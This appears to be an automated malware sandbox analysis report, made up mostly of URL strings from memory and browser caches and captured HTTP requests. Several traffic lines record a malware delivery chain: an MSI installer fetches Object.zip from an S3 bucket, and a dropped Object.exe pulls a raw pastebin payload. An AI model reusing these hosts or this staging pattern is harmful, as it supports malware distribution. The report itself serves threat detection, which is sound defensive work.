Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/corre%C3%A7%C3%A3o%2C-ocorreu-um-erro-ao-abrir-este-documento/amp/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/corrigir-erro-de-dll-isdone-unarc-dll-retornou-mensagem-de-c%C3%B3digo-de-e
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/20-Galaxy-Note/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/5g/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/Apple-TV/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/Call-of-Duty/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/Facebook/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/Fashoin/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/LastPass/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/MacOS/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/MediaTek/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/Microsoft-Edge/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/Netflix/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/alimento-2/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/amazon-alexa/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/ambiente-2/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/aur%C3%A9ola-infinita/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/autofill/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/blogue/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/companhia/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/equipes-da-microsoft/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/f1-2020/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/ferramenta-de-Recorte/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/fifa-21/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/fogo-amaz%C3%B4nico/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/fones-de-ouvido-sem-fio/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/fones-de-ouvido/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/impressionante/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/iphone/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/janelas-10/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/janelas-de-configura%C3%A7%C3%B5es/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/laptop/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/m%C3%BAsica-2/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/microsoft-365/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/microsoft-surface-duo/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/microsoft/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/novo/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/onedrive/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/oneplus-north/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/pr%C3%B3ximo-hub/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/revista/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/senha/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/software-livre/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/tecnologia-2/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/tubar%C3%A3o-negro-3/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/vpn/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/etiqueta/widget-de-software/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/falha-na-restaura%C3%A7%C3%A3o-do-sistema-devido-%C3%A0-corre%C3%A7%C3%A3o-
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/fazer-o-google-chrome-baixar-arquivos-pdf-em-vez-de-abri-los/
Source: iexplore.exe, 00000012.00000002.359038323.0000020557CA5000.00000004.00000001.sdmpString found in binary or memory: https://websetnet.net/pt/fi
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/fix-edge-not-opening-pdf-files-in-windows--10/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/fix-the-disc-image-file-is-corrupted-error-in-windows--10/
Source: iexplore.exe, 00000012.00000002.359268376.0000020557D3C000.00000004.00000001.sdmp, fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/
Source: iexplore.exe, 00000012.00000002.359286546.0000020557D48000.00000004.00000001.sdmp, iexplore.exe, 00000012.00000002.358423860.000002055539D000.00000004.00000020.sdmp, iexplore.exe, 00000012.00000002.359021163.0000020557C94000.00000004.00000001.sdmp, {DD0F9179-5CBB-11EC-90E9-ECF4BB862DED}.dat.18.dr, 3DvoVCc[1].htm.19.dr, ~DF809FE4934051D0D6.TMP.18.drString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
Source: iexplore.exe, 00000012.00000002.359237403.0000020557D23000.00000004.00000001.sdmpString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google&
Source: websetnet[1].xml.19.drString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google"
Source: iexplore.exe, 00000012.00000002.359286546.0000020557D48000.00000004.00000001.sdmpString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google.
Source: iexplore.exe, 00000012.00000002.359038323.0000020557CA5000.00000004.00000001.sdmpString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google02&market=
Source: iexplore.exe, 00000012.00000002.359187116.0000020557CFB000.00000004.00000001.sdmpString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google8Y%Q
Source: iexplore.exe, 00000012.00000002.358384147.0000020555394000.00000004.00000020.sdmpString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google9
Source: iexplore.exe, 00000012.00000002.359237403.0000020557D23000.00000004.00000001.sdmpString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleB
Source: iexplore.exe, 00000012.00000002.359237403.0000020557D23000.00000004.00000001.sdmpString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleF
Source: iexplore.exe, 00000012.00000002.358384147.0000020555394000.00000004.00000020.sdmpString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleK
Source: iexplore.exe, 00000012.00000002.358384147.0000020555394000.00000004.00000020.sdmpString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleO
Source: iexplore.exe, 00000012.00000002.358922395.0000020557180000.00000004.00020000.sdmpString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google_ymBRC
Source: iexplore.exe, 00000012.00000002.359038323.0000020557CA5000.00000004.00000001.sdmpString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googlerast=
Source: iexplore.exe, 00000012.00000002.359187116.0000020557CFB000.00000004.00000001.sdmpString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googlewS
Source: iexplore.exe, 00000012.00000002.359268376.0000020557D3C000.00000004.00000001.sdmpString found in binary or memory: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/s
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/fixo-windows-update-error-0x800f0986/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/instalar-android-7-0-nougat-rom-no-n%C3%BAcleo-de-gal%C3%A1xias-2-sm-g355h/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/lista-de-ROM-personalizada-do-android-11-atualize-n%C3%A3o-oficialmente-seu
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/o-melhor-guia-para-corrigir-problemas-com-a-atualiza%C3%A7%C3%A3o-de-maio-d
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/samsung-galaxy-z-fold-3-pode-ser-agendado-para-junho-de-2021-com-suporte-pa
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/sites-para-assistir-filmes-on-line-10-melhores-sites-sem-baix%C3%A1-los/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/solucionar-problemas-do-outlook-n%C3%A3o-implementado-incapazes-de-enviar-e
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/the-7-best-pdf-readers-for-windows-em-2020/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/pt/wp-login.php
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/ro/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/ru/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/sd/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/si/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/sk/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/sl/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/sm/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/sn/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/so/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/sq/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/sr/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/st/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/su/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/sv/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/sw/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/ta/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/te/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/tg/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/th/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/tl/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/tr/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/uk/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/ur/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/uz/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/vi/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/wp-json/wordpress-popular-posts
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/wp-json/wordpress-popular-posts/v1/popular-posts
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/xh/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/xmlrpc.php
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/yi/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/yo/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/zh-CN/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/zh-TW/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://websetnet.net/zu/fix-there-was-an-error-opening-this-document/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/adobe-error-16-windows-10/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/adobe-reader-install-failed/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/can-t-print-pdf-files-adobe-reader/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/category/fix/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/error-2__trashed/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/error-accessing-the-registry/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/fix-adobe-reader-error-14/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/pdf-files-not-printing-properly-windows-10/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/portable-document-format/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/tag/pdf/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/there-was-an-error-opening-this-document-access-denied/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/there-was-an-error-opening-this-document-access-denied/%20https://bitdefen
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/there-was-an-error-opening-this-document-access-denied/%20https://secure.2
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/there-was-an-error-opening-this-document-access-denied/%20https://store.io
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/there-was-an-error-opening-this-document-access-denied/%20https://windowsr
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/windows-defender-0x80073afc-windows-10/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://windowsreport.com/windows-explorer-crash-right-click/
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://wordpress.org/plugins/shins-pageload-magic/
Source: RT.msi, MSIBA90.tmp.4.dr, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.drString found in binary or memory: https://www.advancedinstaller.com
Source: Object.exe.10.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Object.exe.10.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: f[4].txt.19.dr, f[2].txt.19.dr, f[3].txt.19.dr, f[1].txt.19.drString found in binary or memory: https://www.google.com/adsense
Source: iexplore.exe, 00000012.00000002.359164658.0000020557CF2000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: iexplore.exe, 00000012.00000002.359038323.0000020557CA5000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngh
Source: iexplore.exe, 00000012.00000002.358117318.00000205552FF000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/favicon.ico
Source: iexplore.exe, 00000012.00000002.359237403.0000020557D23000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/favicon.icoNvvP_
Source: fix-there-was-an-error-opening-this-document[1].htm.19.drString found in binary or memory: https://www.iobit.com/en/redirect.php?AFF=84641&PATH=https://update.iobit.com/dl/iobituninstalle
Source: iexplore.exe, 00000012.00000002.359152378.0000020557CEE000.00000004.00000001.sdmp, iexplore.exe, 00000012.00000002.359038323.0000020557CA5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
Source: RT.msi, MSIBA90.tmp.4.dr, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.drString found in binary or memory: https://www.thawte.com/cps0/
Source: RT.msi, MSIBA90.tmp.4.dr, MSI77C2.tmp.4.dr, MSI74A2.tmp.4.dr, MSIAF72.tmp.4.dr, MSI7B7E.tmp.4.dr, 4c6e2b.rbs.4.dr, MSI7A16.tmp.4.dr, MSI7689.tmp.4.dr, 4c6e29.msi.4.dr, MSI759D.tmp.4.dr, MSI79B7.tmp.4.dr, MSI7FC6.tmp.4.drString found in binary or memory: https://www.thawte.com/repository0W
Source: watch[1].js.19.drString found in binary or memory: https://yastatic.net/s3/gdpr/popup/v2/
Source: watch[1].js.19.drString found in binary or memory: https://yastatic.net/s3/metrika
Source: watch[1].js.19.drString found in binary or memory: https://ymetrica1.com/watch/3/1
Source: unknownDNS traffic detected: queries for: procuradoriageral.s3.us-east-2.amazonaws.com
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004B9210 WSARecv,WSAGetLastError,20_2_004B9210
Source: global trafficHTTP traffic detected: GET /Object.zip HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: procuradoriageral.s3.us-east-2.amazonaws.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /raw/p3uk77tC HTTP/1.1Host: pastebin.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /3DvoVCc HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: bit.lyConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /pt/fix-there-was-an-error-opening-this-document/?utm_source=google HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: websetnet.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: websetnet.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/bm/cv/669835187/api.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: websetnet.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css/websetnet.net/wp-content/themes/magazine-pro/style.css HTTP/1.1Accept: text/css, */*Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp/c/5.8.2/wp-includes/css/dist/block-library/style.min.css HTTP/1.1Accept: text/css, */*Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css/websetnet.net/wp-content/themes/magazine-pro/lib/gutenberg/front-end.css HTTP/1.1Accept: text/css, */*Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css/websetnet.net/wp-content/plugins/wordpress-popular-posts/assets/css/wpp.css HTTP/1.1Accept: text/css, */*Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css/websetnet.net/wp-content/plugins/gtranslate/gtranslate-style24.css HTTP/1.1Accept: text/css, */*Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css/websetnet.net/wp-content/plugins/sassy-social-share/public/css/sassy-social-share-public.css HTTP/1.1Accept: text/css, */*Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /beacon.min.js/v64f9daad31f64f81be21cbef6184a5e31634941392597 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoOrigin: https://websetnet.netAccept-Encoding: gzip, deflateHost: static.cloudflareinsights.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tdn-bin/queue.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: tdns5.gtranslate.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /beacon.min.js/v64f9daad31f64f81be21cbef6184a5e31634941392597 HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoOrigin: https://websetnet.netAccept-Encoding: gzip, deflateHost: static.cloudflareinsights.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css/websetnet.net/wp-content/plugins/sassy-social-share/admin/css/sassy-social-share-svg.css HTTP/1.1Accept: text/css, */*Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /css/websetnet.net/wp-content/plugins/yet-another-related-posts-plugin/style/related.css HTTP/1.1Accept: text/css, */*Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp/c/5.8.2/wp-includes/js/jquery/jquery-migrate.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp/c/5.8.2/wp-includes/js/jquery/jquery.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googleAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.statically.ioConnection: Keep-Alive
